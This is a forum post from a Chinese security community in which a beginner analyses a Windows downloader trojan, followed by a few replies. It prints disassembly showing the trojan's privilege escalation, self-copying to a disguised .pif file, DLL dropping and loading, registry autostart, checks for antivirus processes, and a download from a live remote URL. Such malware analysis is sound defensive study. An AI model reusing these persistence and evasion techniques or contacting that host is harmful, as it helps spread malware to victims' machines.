[原创]菜鸟的一个小木马分析请大家赐教-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [原创]菜鸟的一个小木马分析请大家赐教 0.00雪花

发表于: 2012-7-29 12:09 3684

[旧帖] [原创]菜鸟的一个小木马分析请大家赐教 0.00雪花

麦小扣

2012-7-29 12:09

3684

算是第一次自己分析一个完整的木马，时间花费很长释放的dll还没来及分析后面会跟上。好多api都是刚刚查过才知道。很简单大家不要吐槽啊。附件里面有idb和原文件还有脱壳后的文件。欢迎大家批评指教

基本信息

  报告名称：ye.exe下载者木马分析
  作者：
  报告更新日期：2012.7.29

  文件名称：9648c7cc2f01d7b67718cb89a48d927e

  文件哈希：9648c7cc2f01d7b67718cb89a48d927e

  文件大小：31528字节

  创建时间：2012-04-13 02:01:37

  文件类型：EXE

  PEID信息：UPX 2.93 (LZMA) [Overlay] *
  可能受到威胁的系统：
  windows

详细分析／功能介绍

1.upx解压缩执行原程序

2.提升进程权限，创建互斥体

3保存自身到文件

4释放dll加载dll，修改注册表使dll自启动

5下载文件  "http://c.shidaihuabian.com/s.gif" >> "%windir%\temp\olm.ini"

提升进程权限，创建互斥体，跳转到主体部分

部分反汇编代码

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CODE:00401820                push ebp
CODE:00401821                mov    ebp, esp
CODE:00401823                sub    esp, 174h
CODE:00401829                push ebx
CODE:0040182A                push esi
CODE:0040182B                push 1
CODE:0040182D                call _Rtladjustprivilege ; 提升整个进程的权限至14h
CODE:00401832                push 104h
CODE:00401837                push offset modulepath
CODE:0040183C                push 0
CODE:0040183E                call _getmodulefilename ; 返回当前程序的路径
CODE:00401843                add    esp, 10h
CODE:00401846                mov    al, 's'
CODE:00401848                mov    [ebp+var_10], al
CODE:0040184B                mov    [ebp+var_42], al
CODE:0040184E                push offset Name    ; "KAIFAONGQUMEIGANDE"
CODE:00401853                mov    bl, 'e'
CODE:00401855                mov    al, 'E'
CODE:00401857                push 0             ; bInitialOwner
CODE:00401859                push 0             ; lpMutexAttributes
CODE:0040185B                mov    [ebp+var_8], 'o'
CODE:0040185F                mov    [ebp+var_7], 'p'
CODE:00401863                mov    [ebp+var_6], bl ; e
CODE:00401866                mov    [ebp+var_5], 'n'
CODE:0040186A                mov    [ebp+var_4], 0
CODE:0040186E                mov    [ebp+var_F], 'c'
CODE:00401872                mov    [ebp+var_E], '.'
CODE:00401876                mov    [ebp+var_D], bl ; e
CODE:00401879                mov    [ebp+var_C], 'x'
CODE:0040187D                mov    [ebp+var_B], bl ; e
CODE:00401880                mov    [ebp+var_A], 0
CODE:00401884                mov    [ebp+var_44], 't'
CODE:00401888                mov    [ebp+var_43], 'a'
CODE:0040188C                mov    [ebp+var_41], 'k'
CODE:00401890                mov    [ebp+var_40], 'k'
CODE:00401894                mov    [ebp+var_3F], 'i'
CODE:00401898                mov    [ebp+var_3E], 'l'
CODE:0040189C                mov    [ebp+var_3D], 'l'
CODE:004018A0                mov    [ebp+var_3C], '.'
CODE:004018A4                mov    [ebp+var_3B], bl ; e
CODE:004018A7                mov    [ebp+var_3A], 78h
CODE:004018AB                mov    [ebp+var_39], bl ; e
CODE:004018AE                mov    [ebp+var_38], 0
CODE:004018B2                mov    [ebp+var_28], bl ; e
CODE:004018B5                mov    [ebp+var_27], 'k'
CODE:004018B9                mov    [ebp+var_26], 'r'
CODE:004018BD                mov    [ebp+var_25], 'n'
CODE:004018C1                mov    [ebp+var_24], '.'
CODE:004018C5                mov    [ebp+var_23], al ; E
CODE:004018C8                mov    [ebp+var_22], 'X'
CODE:004018CC                mov    [ebp+var_21], al ; E
CODE:004018CF                mov    [ebp+var_20], 0
CODE:004018D3                call CreateMutexA ; 创建互斥体
CODE:004018D9                mov    esi, eax
CODE:004018DB                nop
CODE:004018DC                nop
CODE:004018DD                nop
CODE:004018DE                nop
CODE:004018DF                nop
CODE:004018E0                call GetLastError
CODE:004018E6                cmp    eax, 0B7h
CODE:004018EB                jnz    short @mainpart ; 如果互斥体不存在那么说明没有同样的进程正在运行跳转运行程序
CODE:004018ED                push esi
CODE:004018EE                call _closehandle
CODE:004018F3                add    esp, 4
CODE:004018F6                nop
CODE:004018F7                nop
CODE:004018F8                nop
CODE:004018F9                nop
CODE:004018FA                push 0             ; uType
CODE:004018FC                push offset Caption  ; "0"
CODE:00401901                push offset Caption  ; "0"
CODE:00401906                push 0FFFFFFFFh    ; hWnd
CODE:00401908                call MessageBoxA
CODE:0040190E                push 0             ; uExitCode
CODE:00401910                call ExitProcess
CODE:00401916 ; ---------------------------------------------------------------------------

劫持ekrn.exe 释放c:/programfile/common file//rgdltecq//nhoifz.pif跳转到释放dll的部分

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CODE:004019BB                call sub_4028D0    ; 获取ekrn.exe ID
CODE:004019C0                add    esp, 4
CODE:004019C3                cmp    eax, 1
CODE:004019C6                jbe    short loc_401A2A ; 如果没有开启ekrn.exe跳转开启先进行处理
CODE:004019C8                push 0
CODE:004019CA                lea    ecx, [ebp+var_50]
CODE:004019CD                push 0
CODE:004019CF                lea    edx, [ebp+var_10]
CODE:004019D2                push ecx
CODE:004019D3                lea    eax, [ebp+var_8]
CODE:004019D6                push edx
CODE:004019D7                push eax
CODE:004019D8                push 0
CODE:004019DA                call sub_4027A0
CODE:004019DF                push 1F4h
CODE:004019E4                call _Sleep
CODE:004019E9                push 0
CODE:004019EB                lea    ecx, [ebp+var_60]
CODE:004019EE                push 0
CODE:004019F0                lea    edx, [ebp+var_44]
CODE:004019F3                push ecx
CODE:004019F4                lea    eax, [ebp+var_8]
CODE:004019F7                push edx
CODE:004019F8                push eax
CODE:004019F9                push 0
CODE:004019FB                call sub_4027A0
CODE:00401A00                push 1F4h
CODE:00401A05                call _Sleep
CODE:00401A0A                nop
CODE:00401A0B                nop
CODE:00401A0C                nop
CODE:00401A0D                nop
CODE:00401A0E                nop
CODE:00401A0F                nop
CODE:00401A10                push 0
CODE:00401A12                lea    ecx, [ebp+var_70]
CODE:00401A15                push 0
CODE:00401A17                lea    edx, [ebp+var_44]
CODE:00401A1A                push ecx
CODE:00401A1B                lea    eax, [ebp+var_8]
CODE:00401A1E                push edx
CODE:00401A1F                push eax
CODE:00401A20                push 0
CODE:00401A22                call sub_4027A0
CODE:00401A27                add    esp, 50h
CODE:00401A2A
CODE:00401A2A loc_401A2A:                            ; CODE XREF: start+1A6j
CODE:00401A2A                push edi
CODE:00401A2B                mov    ecx, 40h
CODE:00401A30                xor    eax, eax
CODE:00401A32                lea    edi, [ebp+var_173]
CODE:00401A38                mov    [ebp+floderpath], 0
CODE:00401A3F                push 1             ; 如果不存在创建
CODE:00401A41                rep stosd
CODE:00401A43                stosw
CODE:00401A45                lea    ecx, [ebp+floderpath]
CODE:00401A4B                push 2Bh          ; c:/programfile/common file
CODE:00401A4D                push ecx
CODE:00401A4E                push 0
CODE:00401A50                stosb                ; 43字节全为0
CODE:00401A51                call _SHGetSpecialFloderPath ; 获取上面的路径如果文件不存在创建新的
CODE:00401A56                mov    esi, lstrcat
CODE:00401A5C                add    esp, 10h
CODE:00401A5F                lea    edx, [ebp+floderpath]
CODE:00401A65                mov    [ebp+Caption], 'r'
CODE:00401A69                push offset asc_41D8C8 ; "\\"
CODE:00401A6E                push edx
CODE:00401A6F                mov    [ebp+var_1B], 'g'
CODE:00401A73                mov    [ebp+var_1A], 'd'
CODE:00401A77                mov    [ebp+var_19], 'l'
CODE:00401A7B                mov    [ebp+var_18], 't'
CODE:00401A7F                mov    [ebp+var_17], bl ; e
CODE:00401A82                mov    [ebp+var_16], 'c'
CODE:00401A86                mov    [ebp+var_15], 'q'
CODE:00401A8A                mov    [ebp+var_14], 0
CODE:00401A8E                call esi ; lstrcat
CODE:00401A90                lea    eax, [ebp+Caption]
CODE:00401A93                lea    ecx, [ebp+floderpath]
CODE:00401A99                push eax
CODE:00401A9A                push ecx
CODE:00401A9B                call esi ; lstrcat
CODE:00401A9D                lea    edx, [ebp+Caption]
CODE:00401AA0                push 0             ; uType
CODE:00401AA2                lea    eax, [ebp+floderpath]
CODE:00401AA8                push edx          ; lpCaption rgdltecq
CODE:00401AA9                push eax          ; lpText c:/programfile/common file//rgdltecq
CODE:00401AAA                push 0FFFFFFFFh    ; hWnd
CODE:00401AAC                call MessageBoxA
CODE:00401AB2                lea    ecx, [ebp+floderpath]
CODE:00401AB8                push 0
CODE:00401ABA                push ecx
CODE:00401ABB                call _CreateDirectory ; 创建文件夹 c:/programfile/common file//rgdltecq
CODE:00401AC0                add    esp, 8
CODE:00401AC3                lea    edx, [ebp+floderpath]
CODE:00401AC9                mov    [ebp+var_34], 'n'
CODE:00401ACD                mov    [ebp+var_33], 'h'
CODE:00401AD1                push offset asc_41D8C8 ; "\\"
CODE:00401AD6                push edx
CODE:00401AD7                mov    [ebp+var_32], 'o'
CODE:00401ADB                mov    [ebp+var_31], 'i'
CODE:00401ADF                mov    [ebp+var_30], 'f'
CODE:00401AE3                mov    [ebp+var_2F], 'z'
CODE:00401AE7                mov    [ebp+var_2E], '.'
CODE:00401AEB                mov    [ebp+var_2D], 'p'
CODE:00401AEF                mov    [ebp+var_2C], 'i'
CODE:00401AF3                mov    [ebp+var_2B], 'f'
CODE:00401AF7                mov    [ebp+var_2A], 0
CODE:00401AFB                call esi ; lstrcat
CODE:00401AFD                lea    eax, [ebp+var_34]
CODE:00401B00                lea    ecx, [ebp+floderpath]
CODE:00401B06                push eax
CODE:00401B07                push ecx
CODE:00401B08                call esi ; lstrcat
CODE:00401B0A                lea    edx, [ebp+floderpath] ; c:/programfile/common file//rgdltecq//nhoifz.pif
CODE:00401B10                push 0
CODE:00401B12                push edx
CODE:00401B13                push offset modulepath
CODE:00401B18                call _copyfilename ; 把当前文件复制到上面的路径
CODE:00401B1D                push 0FA0h
CODE:00401B22                call _Sleep
CODE:00401B27                add    esp, 10h
CODE:00401B2A                call loc_4015B0
CODE:00401B2F                pop    edi
CODE:00401B30                pop    esi
CODE:00401B31                mov    eax, 1
CODE:00401B36                pop    ebx
CODE:00401B37                mov    esp, ebp
CODE:00401B39                pop    ebp
CODE:00401B3A                retn
CODE:00401B3A start          endp
CODE:00401B3A
CODE:00401B3A ; ---------------------------------------------------------------------------

释放dll，加载dll修改注册表开机自动加载dll。分析这一部分花费了好长时间的 dll部分等下次吧

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CODE:004015B0 loc_4015B0:                            ; CODE XREF: start+30Ap
CODE:004015B0                push ebp
CODE:004015B1                mov    ebp, esp
CODE:004015B3                sub    esp, 1E0h
CODE:004015B9                push ebx
CODE:004015BA                push esi
CODE:004015BB                push edi
CODE:004015BC                nop
CODE:004015BD                nop
CODE:004015BE                nop
CODE:004015BF                nop
CODE:004015C0                jb    short loc_4015C5
CODE:004015C2                jnb    short loc_4015C5
CODE:004015C2 ; ---------------------------------------------------------------------------
CODE:004015C4                db 0E8h ; ?
CODE:004015C5 ; ---------------------------------------------------------------------------
CODE:004015C5
CODE:004015C5 loc_4015C5:                            ; CODE XREF: CODE:004015C0j
CODE:004015C5                                        ; CODE:004015C2j
CODE:004015C5                mov    ecx, 40h
CODE:004015CA                xor    eax, eax
CODE:004015CC                lea    edi, [ebp-14Bh]
CODE:004015D2                mov    byte ptr [ebp-14Ch], 0
CODE:004015D9                rep stosd
CODE:004015DB                stosw
CODE:004015DD                stosb                ; 从-14Bh开始43h个字节置0
CODE:004015DE                lea    eax, [ebp-14Ch]
CODE:004015E4                push 104h
CODE:004015E9                push eax
CODE:004015EA                call _getsystemdirectory ; 获取系统目录
CODE:004015EF                xor    ecx, ecx
CODE:004015F1                add    esp, 8
CODE:004015F4                mov    [ebp-47h], ecx
CODE:004015F7                mov    byte ptr [ebp-48h], 0
CODE:004015FB                mov    [ebp-43h], cx
CODE:004015FF                mov    [ebp-41h], cl
CODE:00401602                call GetTickCount
CODE:00401608                push eax
CODE:00401609                lea    edx, [ebp-48h]
CODE:0040160C                push offset aD_dll ; "\\%d.DLL"
CODE:00401611                push edx
CODE:00401612                call wsprintfA    ; systemruntime.dll
CODE:00401618                lea    edi, [ebp-48h]
CODE:0040161B                or    ecx, 0FFFFFFFFh
CODE:0040161E                xor    eax, eax
CODE:00401620                add    esp, 0Ch
CODE:00401623                repne scasb
CODE:00401625                not    ecx
CODE:00401627                sub    edi, ecx
CODE:00401629                lea    edx, [ebp-14Ch]
CODE:0040162F                mov    esi, edi
CODE:00401631                mov    ebx, ecx
CODE:00401633                mov    edi, edx
CODE:00401635                or    ecx, 0FFFFFFFFh
CODE:00401638                repne scasb
CODE:0040163A                mov    ecx, ebx
CODE:0040163C                dec    edi
CODE:0040163D                shr    ecx, 2
CODE:00401640                rep movsd
CODE:00401642                push eax
CODE:00401643                mov    ecx, ebx
CODE:00401645                lea    eax, [ebp-14Ch] ; %system%systemruntime.dll
CODE:0040164B                and    ecx, 3
CODE:0040164E                push eax
CODE:0040164F                push offset a1    ; "1"
CODE:00401654                rep movsb
CODE:00401656                push 0FFFFFFFFh
CODE:00401658                call MessageBoxA
CODE:0040165E                lea    ecx, [ebp-14Ch]
CODE:00401664                push ecx
CODE:00401665                call @releaseDLL
CODE:0040166A                add    esp, 4
CODE:0040166D                test al, al
CODE:0040166F                jz    loc_401803    ; dll释放失败跳转结束
CODE:00401675                push 1388h
CODE:0040167A                call _Sleep
CODE:0040167F                add    esp, 4
CODE:00401682                lea    edx, [ebp-14Ch]
CODE:00401688                push edx
CODE:00401689                call LoadLibraryA ; 加载刚写的dll
CODE:0040168F                mov    esi, eax
CODE:00401691                test esi, esi
CODE:00401693                jz    loc_401803
CODE:00401699                mov    edi, GetProcAddress
CODE:0040169F                lea    eax, [ebp-8]
CODE:004016A2                mov    bl, 'r'
CODE:004016A4                push eax
CODE:004016A5                push esi
CODE:004016A6                mov    byte ptr [ebp-8], 'W'
CODE:004016AA                mov    byte ptr [ebp-7], 'h'
CODE:004016AE                mov    byte ptr [ebp-6], 'a'
CODE:004016B2                mov    byte ptr [ebp-5], 'i'
CODE:004016B6                mov    byte ptr [ebp-4], 'e'
CODE:004016BA                mov    [ebp-3], bl
CODE:004016BD                mov    byte ptr [ebp-2], 0
CODE:004016C1                call edi ; GetProcAddress ; whaier
CODE:004016C3                push 0
CODE:004016C5                call eax          ; 加载被释放的dll的whaier函数
CODE:004016C7                push 1388h
CODE:004016CC                call _Sleep
CODE:004016D1                add    esp, 8
CODE:004016D4                lea    ecx, [ebp-10h]
CODE:004016D7                mov    byte ptr [ebp-10h], 'S'
CODE:004016DB                mov    byte ptr [ebp-0Fh], 'i'
CODE:004016DF                push ecx
CODE:004016E0                push esi
CODE:004016E1                mov    byte ptr [ebp-0Eh], 'm'
CODE:004016E5                mov    byte ptr [ebp-0Dh], 'e'
CODE:004016E9                mov    byte ptr [ebp-0Ch], 'n'
CODE:004016ED                mov    byte ptr [ebp-0Bh], 'z'
CODE:004016F1                mov    byte ptr [ebp-0Ah], 'e'
CODE:004016F5                mov    byte ptr [ebp-9], 0
CODE:004016F9                call edi ; GetProcAddress ; simenze
CODE:004016FB                push 0
CODE:004016FD                call eax
CODE:004016FF                add    esp, 4
CODE:00401702                lea    edx, [ebp-1E0h]
CODE:00401708                mov    dword ptr [ebp-1E0h], 94h
CODE:00401712                push edx
CODE:00401713                call GetVersionExA
CODE:00401719                cmp    dword ptr [ebp-1DCh], 6
CODE:00401720                jnb    short loc_401736 ; windows版本在98以上
CODE:00401722                lea    eax, [ebp-14Ch]
CODE:00401728                push eax
CODE:00401729                call @change_reg2
CODE:0040172E                add    esp, 4
CODE:00401731                jmp    loc_401803
CODE:00401736 ; ---------------------------------------------------------------------------
CODE:00401736
CODE:00401736 loc_401736:                            ; CODE XREF: CODE:00401720j
CODE:00401736                call @change_reg    ; 更改注册表提升权限是病毒更安全
CODE:0040173B                mov    cl, '\'
CODE:0040173D                push offset modulepath
CODE:00401742                mov    [ebp-38h], cl
CODE:00401745                mov    [ebp-2Eh], cl
CODE:00401748                mov    [ebp-26h], cl
CODE:0040174B                mov    [ebp-17h], cl
CODE:0040174E                lea    ecx, [ebp-40h]
CODE:00401751                push offset a360se ; "360se"
CODE:00401756                mov    al, 'o'
CODE:00401758                mov    dl, 's'
CODE:0040175A                push ecx
CODE:0040175B                push 80000002h
CODE:00401760                mov    byte ptr [ebp-40h], 'S'
CODE:00401764                mov    [ebp-3Fh], al ; o
CODE:00401767                mov    byte ptr [ebp-3Eh], 'f'
CODE:0040176B                mov    byte ptr [ebp-3Dh], 't'
CODE:0040176F                mov    byte ptr [ebp-3Ch], 'w'
CODE:00401773                mov    byte ptr [ebp-3Bh], 'a'
CODE:00401777                mov    [ebp-3Ah], bl ; r
CODE:0040177A                mov    byte ptr [ebp-39h], 'e'
CODE:0040177E                mov    byte ptr [ebp-37h], 'M'
CODE:00401782                mov    byte ptr [ebp-36h], 'i'
CODE:00401786                mov    byte ptr [ebp-35h], 'c'
CODE:0040178A                mov    [ebp-34h], bl ; r
CODE:0040178D                mov    [ebp-33h], al ; o
CODE:00401790                mov    [ebp-32h], dl ; s
CODE:00401793                mov    [ebp-31h], al ; o
CODE:00401796                mov    byte ptr [ebp-30h], 'f'
CODE:0040179A                mov    byte ptr [ebp-2Fh], 't'
CODE:0040179E                mov    byte ptr [ebp-2Dh], 'W'
CODE:004017A2                mov    byte ptr [ebp-2Ch], 'i'
CODE:004017A6                mov    byte ptr [ebp-2Bh], 'n'
CODE:004017AA                mov    byte ptr [ebp-2Ah], 'd'
CODE:004017AE                mov    [ebp-29h], al ; o
CODE:004017B1                mov    byte ptr [ebp-28h], 'w'
CODE:004017B5                mov    [ebp-27h], dl ; s
CODE:004017B8                mov    byte ptr [ebp-25h], 'C'
CODE:004017BC                mov    byte ptr [ebp-24h], 'u'
CODE:004017C0                mov    [ebp-23h], bl ; r
CODE:004017C3                mov    [ebp-22h], bl ; r
CODE:004017C6                mov    byte ptr [ebp-21h], 'e'
CODE:004017CA                mov    byte ptr [ebp-20h], 'n'
CODE:004017CE                mov    byte ptr [ebp-1Fh], 't'
CODE:004017D2                mov    byte ptr [ebp-1Eh], 'V'
CODE:004017D6                mov    byte ptr [ebp-1Dh], 'e'
CODE:004017DA                mov    [ebp-1Ch], bl
CODE:004017DD                mov    [ebp-1Bh], dl
CODE:004017E0                mov    byte ptr [ebp-1Ah], 'i'
CODE:004017E4                mov    [ebp-19h], al
CODE:004017E7                mov    byte ptr [ebp-18h], 'n'
CODE:004017EB                mov    byte ptr [ebp-16h], 'R'
CODE:004017EF                mov    byte ptr [ebp-15h], 'u'
CODE:004017F3                mov    byte ptr [ebp-14h], 'n'
CODE:004017F7                mov    byte ptr [ebp-13h], 0
CODE:004017FB                call loc_4014B0
CODE:00401800                add    esp, 10h
CODE:00401803
CODE:00401803 loc_401803:                            ; CODE XREF: CODE:0040166Fj
CODE:00401803                                        ; CODE:00401693j ...
CODE:00401803                push 2710h
CODE:00401808                call Sleep
CODE:0040180E                pop    edi
CODE:0040180F                pop    esi
CODE:00401810                mov    eax, 1
CODE:00401815                pop    ebx
CODE:00401816                mov    esp, ebp
CODE:00401818                pop    ebp
CODE:00401819                retn
CODE:00401819 ; ---------------------------------------------------------------------------
CODE:0040181A                align 10h
CODE:00401820

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

上传的附件：

ye.zip （634.02kb，13次下载）

收藏・1

免费・6

支持

最新回复 (6)
yuansunxue 雪币： 1024 活跃值： (240) 能力值： ( LV12，RANK：310 ) 在线值：发帖 26 回帖 267 粉丝 1 关注私信	yuansunxue 6 2 楼 lz加油可以把木马接受的命令分析下 2012-7-29 13:32 0
麦小扣雪币： 61 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 10 回帖 28 粉丝 0 关注私信	麦小扣 3 楼会继续努力的 2012-7-29 16:54 0
完美恶魔雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	完美恶魔 4 楼谢谢楼主的分享。真的非常不错zhutizhijia.net主题之家 2012-7-30 15:43 0
临冰结阵雪币： 32 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 20 粉丝 0 关注私信	临冰结阵 5 楼我靠···楼上是做广告的···· 2012-7-30 20:59 0
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 6 楼感谢楼主的分享，将帖子移动至《病毒木马分析》板块 2012-7-31 17:45 0
麦小扣雪币： 61 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 10 回帖 28 粉丝 0 关注私信	麦小扣 7 楼 dll部分这里面的建立service部分没搞明白，以前没有接触过不知道起到什么作用的求教啊。。。功能分析： 1.提升进程权限 2.判断dll运行环境 3.释放文件，创建服务（这几个api以前没见过还没搞懂） 4.创建线程，下载文件（url： http://c.shidaihuabian.com/s.gif）部分反汇编代码： Dll入口 DllEntryPoint proc near .text:10001510 .text:10001510 dllpath = byte ptr -140h .text:10001510 var_3C = byte ptr -3Ch .text:10001510 var_3B = byte ptr -3Bh .text:10001510 var_3A = byte ptr -3Ah .text:10001510 var_39 = byte ptr -39h .text:10001510 var_38 = byte ptr -38h .text:10001510 var_37 = byte ptr -37h .text:10001510 var_36 = byte ptr -36h .text:10001510 var_35 = byte ptr -35h .text:10001510 var_34 = byte ptr -34h .text:10001510 var_33 = byte ptr -33h .text:10001510 var_32 = byte ptr -32h .text:10001510 var_31 = byte ptr -31h .text:10001510 var_30 = byte ptr -30h .text:10001510 var_2F = byte ptr -2Fh .text:10001510 var_2E = byte ptr -2Eh .text:10001510 SubStr = byte ptr -2Ch .text:10001510 var_2B = byte ptr -2Bh .text:10001510 var_2A = byte ptr -2Ah .text:10001510 var_29 = byte ptr -29h .text:10001510 var_28 = byte ptr -28h .text:10001510 var_27 = byte ptr -27h .text:10001510 var_26 = byte ptr -26h .text:10001510 var_25 = byte ptr -25h .text:10001510 var_24 = byte ptr -24h .text:10001510 var_23 = byte ptr -23h .text:10001510 var_22 = byte ptr -22h .text:10001510 var_21 = byte ptr -21h .text:10001510 var_20 = byte ptr -20h .text:10001510 var_1C = byte ptr -1Ch .text:10001510 var_1B = byte ptr -1Bh .text:10001510 var_1A = byte ptr -1Ah .text:10001510 var_19 = byte ptr -19h .text:10001510 var_18 = byte ptr -18h .text:10001510 var_17 = byte ptr -17h .text:10001510 var_16 = byte ptr -16h .text:10001510 var_15 = byte ptr -15h .text:10001510 var_14 = byte ptr -14h .text:10001510 var_13 = byte ptr -13h .text:10001510 var_12 = byte ptr -12h .text:10001510 var_11 = byte ptr -11h .text:10001510 var_10 = byte ptr -10h .text:10001510 var_C = byte ptr -0Ch .text:10001510 var_B = byte ptr -0Bh .text:10001510 var_A = byte ptr -0Ah .text:10001510 var_9 = byte ptr -9 .text:10001510 var_8 = byte ptr -8 .text:10001510 var_7 = byte ptr -7 .text:10001510 var_6 = byte ptr -6 .text:10001510 var_5 = byte ptr -5 .text:10001510 var_4 = byte ptr -4 .text:10001510 var_3 = byte ptr -3 .text:10001510 var_2 = byte ptr -2 .text:10001510 var_1 = byte ptr -1 .text:10001510 hinstDLL = dword ptr 8 .text:10001510 fdwReason = dword ptr 0Ch .text:10001510 lpReserved = dword ptr 10h .text:10001510 .text:10001510 push ebp .text:10001511 mov ebp, esp .text:10001513 sub esp, 140h .text:10001519 mov eax, [ebp+fdwReason] .text:1000151C dec eax .text:1000151D jnz loc_100016E9 .text:10001523 push ebx .text:10001524 push 1 提升进程权限 .text:10001526 call _rtladjustprivilege ; 判断dll运行环境 .text:1000152B mov bl, 'e' .text:1000152D mov [ebp+var_2B], 'x' .text:10001531 mov [ebp+SubStr], bl .text:10001534 mov [ebp+var_2A], 'p' .text:10001538 mov [ebp+var_29], 'l' .text:1000153C mov [ebp+var_28], 'o' .text:10001540 mov [ebp+var_27], 'r' .text:10001544 mov [ebp+var_26], bl .text:10001547 mov [ebp+var_25], 'r' .text:1000154B mov [ebp+var_24], '.' .text:1000154F mov [ebp+var_23], bl .text:10001552 mov [ebp+var_22], 78h .text:10001556 mov [ebp+var_21], bl .text:10001559 mov [ebp+var_20], 0 ; explorer.exe .text:1000155D nop .text:1000155E nop .text:1000155F nop .text:10001560 nop .text:10001561 mov eax, [ebp+hinstDLL] .text:10001564 push 104h .text:10001569 push offset _modulepath .text:1000156E push eax .text:1000156F call _getmodulefilename ; dll的路径 .text:10001574 add esp, 10h .text:10001577 push offset _modulepath ; lpString2 .text:1000157C push offset _modulepathcopy ; lpString1 .text:10001581 call ds:lstrcpyA .text:10001587 lea ecx, [ebp+dllpath] .text:1000158D push 104h ; nSize .text:10001592 push ecx ; lpFilename .text:10001593 push 0 ; hModule .text:10001595 call ds:GetModuleFileNameA ; 调用dll的路径 .text:1000159B lea edx, [ebp+SubStr] .text:1000159E lea eax, [ebp+dllpath] .text:100015A4 push edx ; SubStr .text:100015A5 push eax ; Str .text:100015A6 call _strlwr .text:100015AB add esp, 4 .text:100015AE push eax ; Str .text:100015AF call strstr .text:100015B4 add esp, 8 .text:100015B7 test eax, eax .text:100015B9 jz short loc_100015F0 ; 如果调用dll的不是explorer.exe跳转 .text:100015BB push esi .text:100015BC nop .text:100015BD push 0 释放文件创建服务 .text:100015BF call sub_10008B60 ; .text:100015C4 add esp, 4 创建线程下载url文件 .text:100015C7 mov esi, ds:CreateThread ; .text:100015CD push 0 ; lpThreadId .text:100015CF push 0 ; dwCreationFlags .text:100015D1 push 0 ; lpParameter .text:100015D3 push offset loc_100011D0 ; lpStartAddress .text:100015D8 push 0 ; dwStackSize .text:100015DA push 0 ; lpThreadAttributes .text:100015DC call esi ; CreateThread .text:100015DE push 0 ; lpThreadId .text:100015E0 push 0 ; dwCreationFlags .text:100015E2 push 0 ; lpParameter .text:100015E4 push offset StartAddress ; lpStartAddress .text:100015E9 push 0 ; dwStackSize .text:100015EB push 0 ; lpThreadAttributes .text:100015ED call esi ; CreateThread .text:100015EF pop esi .text:100015F0 .text:100015F0 loc_100015F0: ; CODE XREF: DllEntryPoint+A9j .text:100015F0 mov cl, 'a' ; 判断是否在安全软件中运行 .text:100015F2 mov dl, '0' .text:100015F4 mov [ebp+var_37], cl .text:100015F7 mov [ebp+var_17], cl .text:100015FA mov [ebp+var_3A], dl .text:100015FD mov [ebp+var_1A], dl .text:10001600 lea ecx, [ebp+var_3C] .text:10001603 lea edx, [ebp+dllpath] .text:10001609 mov al, 'q' .text:1000160B push ecx ; SubStr .text:1000160C push edx ; Str .text:1000160D mov [ebp+var_3C], '3' .text:10001611 mov [ebp+var_3B], '6' .text:10001615 mov [ebp+var_39], 'r' .text:10001619 mov [ebp+var_38], bl .text:1000161C mov [ebp+var_36], 'l' .text:10001620 mov [ebp+var_35], 'p' .text:10001624 mov [ebp+var_34], 'r' .text:10001628 mov [ebp+var_33], 'o' .text:1000162C mov [ebp+var_32], '.' .text:10001630 mov [ebp+var_31], bl .text:10001633 mov [ebp+var_30], 78h .text:10001637 mov [ebp+var_2F], bl .text:1000163A mov [ebp+var_2E], 0 ; 360realpro.exe .text:1000163E mov [ebp+var_C], al .text:10001641 mov [ebp+var_B], al .text:10001644 mov [ebp+var_A], 'p' .text:10001648 mov [ebp+var_9], 'c' .text:1000164C mov [ebp+var_8], 'm' .text:10001650 mov [ebp+var_7], 'g' .text:10001654 mov [ebp+var_6], 'r' .text:10001658 mov [ebp+var_5], '.' .text:1000165C mov [ebp+var_4], bl .text:1000165F mov [ebp+var_3], 78h .text:10001663 mov [ebp+var_2], bl .text:10001666 mov [ebp+var_1], 0 ; qqpcmgr.exe qq电脑管家进程 .text:1000166A mov [ebp+var_1C], '3' .text:1000166E mov [ebp+var_1B], '6' .text:10001672 mov [ebp+var_19], al .text:10001675 mov [ebp+var_18], 'u' .text:10001679 mov [ebp+var_16], 'r' .text:1000167D mov [ebp+var_15], 't' .text:10001681 mov [ebp+var_14], '.' .text:10001685 mov [ebp+var_13], bl .text:10001688 mov [ebp+var_12], 'x' .text:1000168C mov [ebp+var_11], bl .text:1000168F mov [ebp+var_10], 0 ; 360urt.exe .text:10001693 call _strlwr .text:10001698 add esp, 4 .text:1000169B push eax ; Str .text:1000169C call strstr .text:100016A1 add esp, 8 .text:100016A4 test eax, eax .text:100016A6 pop ebx .text:100016A7 jnz short loc_100016F4 ; 在安全软件中运行 .text:100016A9 lea eax, [ebp+var_1C] .text:100016AC lea ecx, [ebp+dllpath] .text:100016B2 push eax ; SubStr .text:100016B3 push ecx ; Str .text:100016B4 call _strlwr .text:100016B9 add esp, 4 .text:100016BC push eax ; Str .text:100016BD call strstr .text:100016C2 add esp, 8 .text:100016C5 test eax, eax .text:100016C7 jnz short loc_100016F4 ; 在安全软件中运行 .text:100016C9 lea edx, [ebp+var_C] .text:100016CC lea eax, [ebp+dllpath] .text:100016D2 push edx ; SubStr .text:100016D3 push eax ; Str .text:100016D4 call _strlwr .text:100016D9 add esp, 4 .text:100016DC push eax ; Str .text:100016DD call strstr .text:100016E2 add esp, 8 .text:100016E5 test eax, eax .text:100016E7 jnz short loc_100016F4 ; 在安全软件中运行 .text:100016E9 .text:100016E9 loc_100016E9: ; CODE XREF: DllEntryPoint+Dj .text:100016E9 mov eax, 1 .text:100016EE mov esp, ebp .text:100016F0 pop ebp .text:100016F1 retn 0Ch .text:100016F4 ; --------------------------------------------------------------------------- .text:100016F4 .text:100016F4 loc_100016F4: ; CODE XREF: DllEntryPoint+197j .text:100016F4 ; DllEntryPoint+1B7j ... .text:100016F4 push 0 ; 在安全软件中运行 .text:100016F6 call 